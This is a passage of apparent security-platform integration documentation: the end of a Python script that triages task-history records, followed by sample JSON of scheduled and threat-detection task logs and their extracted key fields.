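   "userName": "jdoe", "status": "Completed", "taskSource": "scheduler"}
]
"""


def _parse_ts(value):
    """Parse an ISO 8601 timestamp with a UTC offset; None if absent or malformed."""
    if not isinstance(value, str):
        return None
    try:
        return datetime.fromisoformat(value)
    except ValueError:
        return None


def load_tasks(raw_data):
    """Decode Raw Data and attach elapsedSeconds computed from the timestamps."""
    records = json.loads(raw_data)
    if not isinstance(records, list):
        raise ValueError("expected a JSON array of task history records")
    tasks = []
    for rec in records:
        if not isinstance(rec, dict):
            continue  # skip anything that is not a task record
        start = _parse_ts(rec.get("startDate"))
        end = _parse_ts(rec.get("endDate"))
        try:
            elapsed = (end - start).total_seconds() if start and end else None
        except TypeError:  # one timestamp has an offset and the other does not
            elapsed = None
        tasks.append({**rec, "elapsedSeconds": elapsed})
    return tasks


def triage(tasks, expected_users=("system", "admin"), max_seconds=300):
    """Return (id, name, reasons) for every record that needs a second look."""
    findings = []
    for task in tasks:
        reasons = []
        if task.get("status") != "Completed":
            reasons.append(f"status={task.get('status')!r}")
        if task.get("userName") not in expected_users:
            reasons.append(f"unexpected user {task.get('userName')!r}")
        if task["elapsedSeconds"] is None:
            reasons.append("missing or unparseable start/end time")
        elif task["elapsedSeconds"] > max_seconds:
            reasons.append(f"ran {int(task['elapsedSeconds'])}s")
        if reasons:
            # The id is treated as an opaque string; it may be masked ("*****").
            findings.append((task.get("id"), task.get("name"), reasons))
    return findings


def count_by_source(tasks):
    """Count records per (taskSource, name) to spot unusually noisy tasks."""
    return Counter((t.get("taskSource"), t.get("name")) for t in tasks)


if __name__ == "__main__":
    loaded = load_tasks(SAMPLE_RAW_DATA)
    for task_id, name, reasons in triage(loaded):
        print(f"{task_id} {name}: {'; '.join(reasons)}")
    for key, count in count_by_source(loaded).most_common():
        print(count, key)
```
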
Context Data

The data extracted from Raw Data and converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:01:41-08:00",
        "endDate": "2019-12-09T18:01:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:03:42-08:00",
        "endDate": "2019-12-09T18:03:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:03:42-08:00",
        "endDate": "2019-12-09T18:03:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:03:42-08:00",
        "endDate": "2019-12-09T18:03:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:03:42-08:00",
        "endDate": "2019-12-09T18:03:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "jhou Sync Status",
        "startDate": "2019-12-09T18:05:36-08:00",
        "endDate": "2019-12-09T18:06:02-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "accountSyncStatusTaskSource",
        "duration": "Less than a minute"
    },
    {
        "id": "966977",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:06:42-08:00",
        "endDate": "2019-12-09T18:06:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:08:42-08:00",
        "endDate": "2019-12-09T18:08:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:08:42-08:00",
        "endDate": "2019-12-09T18:08:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:08:42-08:00",
        "endDate": "2019-12-09T18:08:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:08:42-08:00",
        "endDate": "2019-12-09T18:08:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    }
]

Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[\\r\\n    {\\r\\n        \\\"id\\\": \\\"*****\\\",\\r\\n        \\\"name\\\": \\\"DLP Set Reviewer for Operational Events and Incidents\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T17:00:21-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T17:00:21-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10854\\\",\\r\\n        \\\"name\\\": \\\"DLP Send Email for Operational Events and Incidents\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T17:15:23-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T17:15:23-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10855\\\",\\r\\n        \\\"name\\\": \\\"TIE Server Monitoring\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T17:15:23-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T17:15:33-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10856\\\",\\r\\n        \\\"name\\\": \\\"DLP Set Reviewer for Operational Events and Incidents\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T18:00:08-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T18:00:08-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10857\\\",\\r\\n   
     \\\"name\\\": \\\"DLP Send Email for Operational Events and Incidents\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T18:15:15-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T18:15:15-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10858\\\",\\r\\n        \\\"name\\\": \\\"TIE Server Monitoring\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T18:15:15-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T18:15:26-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"*****\\\",\\r\\n        \\\"name\\\": \\\"DLP Set Reviewer for Operational Events and Incidents\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T19:00:06-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T19:00:06-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10860\\\",\\r\\n        \\\"name\\\": \\\"DLP Send Email for Operational Events and Incidents\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T19:15:09-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T19:15:09-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10861\\\",\\r\\n        \\\"name\\\": \\\"TIE Server Monitoring\\\",\\r\\n        
\\\"startDate\\\": \\\"2022-12-08T19:15:09-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T19:15:19-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10862\\\",\\r\\n        \\\"name\\\": \\\"DLP Set Reviewer for Operational Events and Incidents\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T20:00:22-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T20:00:22-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10863\\\",\\r\\n        \\\"name\\\": \\\"TIE Server Monitoring\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T20:15:27-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T20:15:38-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10864\\\",\\r\\n        \\\"name\\\": \\\"DLP Send Email for Operational Events and Incidents\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T20:15:27-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T20:15:28-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10865\\\",\\r\\n        \\\"name\\\": \\\"DLP Set Reviewer for Operational Events and Incidents\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T21:00:03-08:00\\\",\\r\\n        
\\\"endDate\\\": \\\"2022-12-08T21:00:03-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10866\\\",\\r\\n        \\\"name\\\": \\\"DLP Send Email for Operational Events and Incidents\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T21:15:15-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T21:15:16-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10867\\\",\\r\\n        \\\"name\\\": \\\"TIE Server Monitoring\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T21:15:16-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T21:15:31-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10868\\\",\\r\\n        \\\"name\\\": \\\"DLP Set Reviewer for Operational Events and Incidents\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T22:00:02-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T22:00:02-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10869\\\",\\r\\n        \\\"name\\\": \\\"DLP Send Email for Operational Events and Incidents\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T22:15:21-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T22:15:21-08:00\\\",\\r\\n        
\\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10870\\\",\\r\\n        \\\"name\\\": \\\"TIE Server Monitoring\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T22:15:21-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T22:15:33-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10871\\\",\\r\\n        \\\"name\\\": \\\"DLP Set Reviewer for Operational Events and Incidents\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T23:00:04-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T23:00:04-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10872\\\",\\r\\n        \\\"name\\\": \\\"DLP Send Email for Operational Events and Incidents\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T23:15:11-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T23:15:11-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10873\\\",\\r\\n        \\\"name\\\": \\\"TIE Server Monitoring\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T23:15:11-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T23:15:21-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        
\\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10874\\\",\\r\\n        \\\"name\\\": \\\"Send DXL Certificate Revocations\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-09T00:00:23-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-09T00:00:23-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10875\\\",\\r\\n        \\\"name\\\": \\\"LdapSync: Sync across users from LDAP\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-09T00:00:23-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-09T00:00:23-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Completed\\\",\\r\\n        \\\"taskSource\\\": \\\"scheduler\\\",\\r\\n        \\\"duration\\\": \\\"Less than a minute\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": \\\"10876\\\",\\r\\n        \\\"name\\\": \\\"Manage DXL Brokers\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-09T00:00:23-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-09T00:00:23-08:00\\\"\\r\\n]\"",
    "duration": "\"[\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a 
minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\"\\r\\n \\r\\n ]\"",
    "endDate": "\"[\\r\\n \\r\\n  \\\"2019-12-16T15:59:51-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T15:59:51-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T15:59:51-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T15:59:51-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:00:06-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:00:06-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:00:06-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:00:06-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:00:07-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:01:52-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:03:02-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:03:51-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:03:51-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:52-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:52-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:52-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:52-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:52-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  
\\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:55-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:55-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:55-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:55-08:00\\\"\\r\\n \\r\\n ]\"",
    "id": "\"[\\r\\n \\r\\n  \\\"*****\\\",\\r\\n \\r\\n  \\\"*****\\\" ]\"",
    "name": "\"[\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Data Center: Compute Dashboard data\\\",\\r\\n \\r\\n  \\\"DLP Set Reviewer for Operational Events and Incidents\\\",\\r\\n \\r\\n  \\\"Data Center: Compute Endpoint Reports\\\",\\r\\n \\r\\n  \\\"LdapSync: Sync across users from LDAP\\\",\\r\\n \\r\\n  \\\"CWS threat events sync task\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"jhou Sync Status\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat 
Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\",\\r\\n \\r\\n  \\\"Threat Detected\\\"\\r\\n \\r\\n ]\"",
    "startDate": "\"[\\r\\n \\r\\n  \\\"2019-12-16T15:59:50-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T15:59:50-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T15:59:50-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T15:59:50-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:00:06-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:00:06-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:00:06-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:00:06-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:00:06-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:01:50-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:02:37-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:03:51-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:03:51-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:51-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:52-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:52-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:52-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:52-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:52-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:52-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:52-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:52-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:52-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:52-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  